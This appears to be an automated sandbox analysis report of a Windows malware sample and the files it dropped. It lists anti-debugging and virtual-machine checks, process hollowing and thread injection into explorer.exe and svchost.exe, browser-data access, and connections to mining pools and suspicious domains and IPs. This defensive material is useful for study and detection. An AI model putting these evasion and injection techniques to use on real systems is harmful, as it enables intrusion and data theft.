                          Source: C:\Users\user\AppData\Local\Temp\7801.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\softokn3.dllJump to dropped file
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CC60.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\prldap60.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\nssdbm3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\qipcap.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\libEGL.dllJump to dropped file
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ACEF.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dllJump to dropped file
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\BEB3.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\lgpllibs.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeEvaded block: after key decision
                          Source: C:\Windows\SysWOW64\svchost.exeEvaded block: after key decision
                          Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: inet_addr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetBestInterface,GetProcessHeap,HeapAlloc,GetAdaptersInfo,HeapReAlloc,GetAdaptersInfo,HeapFree,FreeLibrary,FreeLibrary,
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                          Source: explorer.exe, 00000007.00000000.706025644.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: explorer.exe, 00000007.00000000.679970478.000000000FD46000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA
                          Source: explorer.exe, 00000007.00000000.673323563.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: explorer.exe, 00000007.00000000.706025644.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: svchost.exe, 0000001D.00000002.827857689.00000188ABAA6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@6
                          Source: explorer.exe, 00000007.00000000.693238319.000000000A83C000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}((
                          Source: WerFault.exe, 00000012.00000002.796335241.00000000010C0000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.828113364.00000188ABAEB000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                          Source: explorer.exe, 00000007.00000000.676806232.000000000A9AE000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA}
                          Source: explorer.exe, 00000007.00000000.672052714.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
                          Source: svchost.exe, 0000001D.00000002.827601937.00000188ABA5B000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.825677547.00000188ABA5A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWdisplaycatalog.mp.micros
                          Source: explorer.exe, 00000007.00000000.706560569.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
                          Source: explorer.exe, 00000007.00000000.706825764.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeProcess information queried: ProcessInformation
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeCode function: 21_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeSystem information queried: ModuleInformation

                          Anti Debugging:

                          barindex
                          Found API chain indicative of debugger detectionShow sources
                          Source: C:\Windows\SysWOW64\svchost.exeDebugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleep
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeDebugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleep
                          Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeSystem information queried: CodeIntegrityInformation
                          Source: C:\Users\user\AppData\Roaming\uufaeeaSystem information queried: CodeIntegrityInformation
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeSystem information queried: CodeIntegrityInformation
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_0040A3DE LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00520083 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00530042 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 17_2_00520083 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00401000 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_0040C180 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00460083 push dword ptr fs:[00000030h]
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeCode function: 36_2_00460083 push dword ptr fs:[00000030h]
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeCode function: 36_2_0047092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeCode function: 36_2_00470D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeCode function: 43_2_02EA0083 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeCode function: 43_2_02F70D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeCode function: 43_2_02F7092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Roaming\uufaeeaProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00403C44 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_0040F0AE CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_1_004027ED LdrLoadDll,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeMemory protected: page guard
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00403C44 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00408848 SetUnhandledExceptionFilter,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_0040383B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00407A0C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                          Source: C:\Users\user\AppData\Local\Temp\D984.exeCode function: 14_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeCode function: 21_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeCode function: 36_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 39_2_00329A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          HIPS / PFW / Operating System Protection Evasion:

                          barindex
                          System process connects to network (likely due to code injection or exploit)Show sources
                          Source: C:\Windows\explorer.exeDomain query: pool.supportxmr.com
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                          Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 40.93.212.0 25
                          Source: C:\Windows\explorer.exeDomain query: unicupload.top
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 8.209.67.104 443
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                          Source: C:\Windows\explorer.exeDomain query: privacy-tools-for-you-780.com
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exeDomain query: goo.su
                          Source: C:\Windows\explorer.exeDomain query: transfer.sh
                          Source: C:\Windows\explorer.exeDomain query: a0621298.xsph.ru
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                          Benign windows process drops PE filesShow sources
                          Source: C:\Windows\explorer.exeFile created: 8ED5.exe.7.drJump to dropped file
                          Maps a DLL or memory area into another processShow sources
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Source: C:\Users\user\AppData\Roaming\uufaeeaSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\AppData\Roaming\uufaeeaSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Allocates memory in foreign processesShow sources
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 320000 protect: page execute and read and write
                          Injects a PE file into a foreign processesShow sources
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeMemory written: C:\Users\user\Desktop\U3E7zMaux2.exe base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeMemory written: C:\Users\user\AppData\Local\Temp\8EC4.exe base: 400000 value starts with: 4D5A
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 320000 value starts with: 4D5A
                          Contains functionality to inject code into remote processesShow sources
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00530110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Creates a thread in another existing process (thread injection)Show sources
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeThread created: C:\Windows\explorer.exe EIP: 44E1930
                          Source: C:\Users\user\AppData\Roaming\uufaeeaThread created: unknown EIP: 4F81930
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeThread created: unknown EIP: 5C81930
                          Writes to foreign memory regionsShow sources
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 320000
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 557008
                          .NET source code references suspicious native API functionsShow sources
                          Source: 8EC4.exe.7.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 8EC4.exe.7.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 22.0.8EC4.exe.fa0000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 22.0.8EC4.exe.fa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 22.2.8EC4.exe.fa0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 22.2.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 22.0.8EC4.exe.fa0000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 22.0.8EC4.exe.fa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 22.0.8EC4.exe.fa0000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 22.0.8EC4.exe.fa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 22.0.8EC4.exe.fa0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 22.0.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 40.0.8EC4.exe.400000.10.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 40.0.8EC4.exe.610000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 40.0.8EC4.exe.610000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 40.0.8EC4.exe.400000.6.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 40.0.8EC4.exe.400000.8.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 40.0.8EC4.exe.610000.9.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 40.0.8EC4.exe.610000.9.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 40.2.8EC4.exe.610000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 40.2.8EC4.exe.610000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 40.0.8EC4.exe.610000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 40.0.8EC4.exe.610000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeProcess created: C:\Users\user\Desktop\U3E7zMaux2.exe "C:\Users\user\Desktop\U3E7zMaux2.exe"
                          Source: C:\Users\user\AppData\Roaming\uufaeeaProcess created: C:\Users\user\AppData\Roaming\uufaeea C:\Users\user\AppData\Roaming\uufaeea
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5756 -ip 5756
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 520
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeProcess created: C:\Users\user\AppData\Local\Temp\E666.exe C:\Users\user\AppData\Local\Temp\E666.exe
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\shayesoq\
